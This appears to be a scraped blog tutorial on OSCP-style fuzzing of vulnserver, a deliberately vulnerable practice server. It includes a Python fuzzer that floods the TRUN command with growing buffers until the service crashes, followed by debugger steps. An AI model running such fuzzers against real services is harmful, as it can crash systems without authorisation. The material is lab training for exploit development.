OSCP Security Technology - Fuzzing

2024-01-18 22:28:46

OSCP Security Technology - Fuzzing

Download vulnserver from the grey corner website.

https://thegreycorner.com/vulnserver.html

OSCP Security Technology - Fuzzing

OSCP Security Technology - Fuzzing

Download immunity debugger from here.

https://www.immunityinc.com/products/debugger/

nc -nv 192.168.2.21 9999

Kali

OSCP Security Technology - Fuzzing

Vulserver

OSCP Security Technology - Fuzzing

nano fuzzer.py
chmod 777 fuzzer.py
./fuzzer.py

#!/usr/bin/python
import socket
import sys

buffer=["A"]
counter=100
while len(buffer) <= 30:
    buffer.append("A"*counter)
    counter=counter+200

for string in buffer:
    print "Fuzzing vulnserver with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((‘192.168.2.21‘,9999))
    s.send((‘TRUN /.:/‘ + string))
    s.close()

Create and run the fuzzer script.

OSCP Security Technology - Fuzzing

The vulserver is crashed now.

OSCP Security Technology - Fuzzing

Debug and watch what will happen.

Install and open Immunity Debugger.

OSCP Security Technology - Fuzzing

Attach vulnserver.

OSCP Security Technology - Fuzzing

Run the debugger.

OSCP Security Technology - Fuzzing

Run the fuzzer.py script on Kali Linux again.

OSCP Security Technology - Fuzzing

The vulnserver is crashed and the debugger is paused.

OSCP Security Technology - Fuzzing

OSCP Security Technology - Fuzzing

上一篇:应用 |前端限制仅允许指定ip访问页面


下一篇:简单使用压测工具K6